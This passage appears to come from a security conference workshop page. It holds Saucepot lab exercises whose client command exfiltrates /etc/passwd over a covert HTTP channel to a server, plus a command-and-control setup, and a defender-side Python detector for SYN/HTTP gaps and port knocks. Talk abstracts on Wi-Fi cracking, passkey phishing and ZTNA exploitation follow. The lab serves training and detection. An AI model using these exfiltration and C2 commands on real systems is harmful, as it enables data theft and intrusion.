Server:
```
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
```
Client: exfiltrate /etc/passwd to the server.
```
python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd
```
Exercise 4: Command-and-control operations
To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.
Server:
```
sudo systemctl start nginx
sudo python3 saucepot-server.py -d 172.31.253.199 -p 80
```
Client:
```
python3 saucepot-client.py -d server_public_ip -p 80
```
Exercise 5: Observation of anomalies at L4 and L7
On the server, in two separate windows, watch the web access log and the SYN packets.
Web access log:
```
tail -F /var/log/nginx/access.log
```
SYN packets:
```
sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'
```
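A defender-side companion to Exercise 5, added here and not part of the Saucepot project: it parses constructed tcpdump SYN lines and nginx access-log lines, flags clients whose SYNs to port 80 far outnumber their logged HTTP requests (the L4/L7 gap a source-port channel produces), and reports sources that reproduce the 4100,4200,4500 knock against closed ports. All IPs, timestamps and thresholds are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of what the Exercise 5 tcpdump filter prints with -n (not a real capture).
# 203.0.113.5 sends a burst of SYNs to port 80 from a different source port each time but
# completes only one HTTP request; 198.51.100.7 is an ordinary curl client; 203.0.113.9
# performs the classic 4100,4200,4500 knock against closed ports.
SYN_LINES = """\
12:00:01.000100 IP 203.0.113.5.63034 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:01.200100 IP 203.0.113.5.51151 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:01.400100 IP 203.0.113.5.54321 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:01.600100 IP 203.0.113.5.60012 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:01.800100 IP 203.0.113.5.59777 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:02.000100 IP 203.0.113.5.62010 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:03.000100 IP 198.51.100.7.41002 > 172.31.253.199.80: Flags [S], seq 1, win 64240, length 0
12:00:03.000200 IP 172.31.253.199.80 > 198.51.100.7.41002: Flags [S.], seq 9, ack 2, win 65160, length 0
12:00:05.000100 IP 203.0.113.9.40001 > 172.31.253.199.4100: Flags [S], seq 1, win 64240, length 0
12:00:05.100100 IP 203.0.113.9.40002 > 172.31.253.199.4200: Flags [S], seq 1, win 64240, length 0
12:00:05.200100 IP 203.0.113.9.40003 > 172.31.253.199.4500: Flags [S], seq 1, win 64240, length 0
"""

# Constructed nginx access.log lines for the same window.
ACCESS_LINES = """\
203.0.113.5 - - [01/Aug/2025:12:00:02 +0000] "GET /chk-version HTTP/1.1" 200 8 "-" "curl/8.5.0"
198.51.100.7 - - [01/Aug/2025:12:00:03 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/8.5.0"
"""

SYN_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def parse_syn_line(line):
    """Return (seconds_since_midnight, src_ip, src_port, dst_ip, dst_port, flags) or None."""
    m = SYN_RE.match(line)
    if not m:
        return None
    h, mi, s = m["ts"].split(":")
    t = int(h) * 3600 + int(mi) * 60 + float(s)
    return t, m["src"], int(m["sport"]), m["dst"], int(m["dport"]), m["flags"]


def pure_syns(syn_text):
    """Per source IP, the (time, src_port, dst_port) of client-side SYNs; SYN-ACKs ('S.') are skipped."""
    out = defaultdict(list)
    for line in syn_text.splitlines():
        p = parse_syn_line(line)
        if p and p[5] == "S":
            out[p[1]].append((p[0], p[2], p[4]))
    return out


def requests_per_client(access_text):
    """Count nginx access-log lines per client IP (first field of the combined log format)."""
    counts = defaultdict(int)
    for line in access_text.splitlines():
        if line.strip():
            counts[line.split(" ", 1)[0]] += 1
    return dict(counts)


def syn_request_gap(syn_text, access_text, dst_port=80, min_syns=5):
    """L4 vs L7 check: flag clients whose SYNs to dst_port far outnumber the requests nginx logged.

    A client carrying data in the source-port field opens many short-lived sessions but
    produces few or no HTTP requests, so the two counts diverge.
    """
    reqs = requests_per_client(access_text)
    flagged = {}
    for ip, events in pure_syns(syn_text).items():
        to_port = [(t, sport) for t, sport, dport in events if dport == dst_port]
        n_syn, n_req = len(to_port), reqs.get(ip, 0)
        if n_syn >= min_syns and n_syn > 2 * n_req:
            flagged[ip] = {"syns": n_syn, "requests": n_req,
                           "distinct_src_ports": len({sp for _, sp in to_port})}
    return flagged


def knock_sequences(syn_text, sequence=(4100, 4200, 4500), seq_timeout=30.0):
    """Classic knock check: sources that hit the closed knock ports in order within seq_timeout seconds."""
    hits = []
    for ip, events in pure_syns(syn_text).items():
        idx, start = 0, None
        for t, _sport, dport in sorted(events):
            if dport == sequence[idx]:
                start = t if idx == 0 else start
                idx += 1
                if idx == len(sequence):
                    if t - start <= seq_timeout:
                        hits.append((ip, round(t - start, 3)))
                    idx, start = 0, None
            elif dport in sequence:  # knock port out of order: start over, as knockd does
                idx, start = 0, None
    return hits


if __name__ == "__main__":
    print("L4/L7 gap:", syn_request_gap(SYN_LINES, ACCESS_LINES))
    print("knocks:", knock_sequences(SYN_LINES))
```

Pipe the live `tcpdump` and `tail -F` output from the two windows into the same functions to watch the gap open in real time; the thresholds are starting points, not tuned values.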
This workshop has been verified on Ubuntu 24.04 LTS.
`-d ip` arg on Server
Hubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.
In Wi-Fi-So-Serious, we will explore setting up and troubleshooting an 802.11 (Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplicant, along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker. The Wi-Fi-So-Serious workshop concludes with a Capture The Flag (CTF) so that participants can apply the course content hands-on-keyboard. Participants will also learn how to set up a lab they can take home with them.
Speakers: James Hawk, Brian Burnett
James Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.
SpeakerBio: Brian Burnett, Founder of Offensive Technical Solutions
Brian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.
While passkeys are being touted as the end of phishing, they might be putting your organization at even more risk. In this talk I will demonstrate a relatively straightforward phishing attack against “phishing-resistant” synced passkeys and provide guidance and advice for responsible passkey usage.
SpeakerBio: Chad Spensky, Ph.D., Allthenticate
Chad is a teenage hacker turned cybersecurity expert who studied under the best in his field at UNC-CH, UCSB’s SecLab, IBM Research, and was a lead researcher at MIT LL where he played a pivotal role in various high-impact projects for the US DoD. He has broken every authentication system under the sun and has committed his career to doing better for our society.
Many organisations are moving to Zero Trust Network Access (ZTNA) and Secure Access Service Edge (SASE) solutions in response to the real and well-documented risks associated with traditional VPNs. These cloud-era alternatives promise improved security through finer-grained access controls and better posture enforcement. But are these 'next-gen' cloud VPNs truly secure? In this 45-minute session, we present new research revealing that many leading ZTNA platforms - including offerings from Zscaler, Netskope and Check Point - inherit legacy VPN weaknesses while introducing fresh cloud-based attack surfaces.
We demonstrate the process of external recon, bypassing authentication and device posture checks (including hardware ID spoofing), and abusing insecure inter-process communication (IPC) between ZTNA client components to achieve local privilege escalation. We show it is possible to circumvent traffic steering to reach blocked content, exploit flaws in authentication flows to undermine device trust, and even run malicious ZTNA servers that execute code on connecting clients. Throughout the presentation, we highlight previously undisclosed vulnerabilities identified during our research. Zero trust does not mean zero risk.
Red Team Operator at AmberWolf (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells' at SANS HackFest Hollywood 2024. David has led red team operations uncovering critical flaws in enterprise remote access tools and has a passion for reverse engineering security products.
SpeakerBio: Rich "Buffaloverflow" Warren, Red Team Operator at AmberWolf
Red Team Operator at AmberWolf and Microsoft Top 100 Security Researcher (formerly with NCC Group). Co-presenter of 'Very Pwnable Networks: Exploiting the Top Corporate VPN Clients…' at HackFest Hollywood 2024. Richard has a track record of discovering novel vulnerabilities in VPN and zero-trust clients and has contributed to multiple high-profile vulnerability disclosures and tools in the offensive security community.
